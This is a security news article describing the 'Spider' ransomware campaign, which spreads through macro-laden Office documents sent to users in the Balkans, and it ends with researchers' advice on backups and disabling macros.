Security researchers reported that while analyzing a mid-scale campaign over the weekend, they have found a new ransomware family. The new threat is called Spider ransomware and it uses decoy documents auto-synced to enterprise cloud storage and collaborations applications.
According to the experts, the Spider ransomware is being distributed via an Office document which targets users in Bosnia and Herzegovina, Serbia, and Croatia.
The spam emails look like the sender is going to collect some debt from the recipient, tricking the user into opening the attached file.
However, the obfuscated macro code embedded in the Office document launches a Base64 encrypted PowerShell script instead to download the malicious payload.
Once the system is infected, the ransomware starts encrypting user’s files and adds the ‘.spider’ extension each affected file.
Fortunately, a decrypter was created to display the users interface and let them decrypt the files using a decryption key. It is executed alongside the encrypter, however, it runs in the background until the encryption process has been completed.
According to the Netskope’s expert Amit Malik, the Spider decrypter monitors system processes and prevents the launch of tools like taskmgr, procexp, msconfig, regedit, cmd, outlook, winword, excel, and msaccess.
During the encryption process, the Spider ransomware skips files in the following folders: tmp, Videos, winnt, Application Data, Spider, PrefLogs, Program Files (x86), Program Files, ProgramData, Temp, Recycle, System Volume Information, Boot, and Windows.
When the encryption process is completed, the decrypter displays a warning (available in English and Croatian) to inform users on how to decrypt their files.
Additionally, there is a help section which includes links and references to the resources needed to make the payment which is approximately $120.
“As ransomware continues to evolve, administrators should educate employees about the impact of ransomware and ensure the protection of the organization’s data by making a regular backup of critical data. In addition to disabling macros by default, users must also be cautious of documents that only contain a message to enable macros to view the contents and also not to execute unsigned macros and macros from untrusted sources,” the Netskope researchers state.
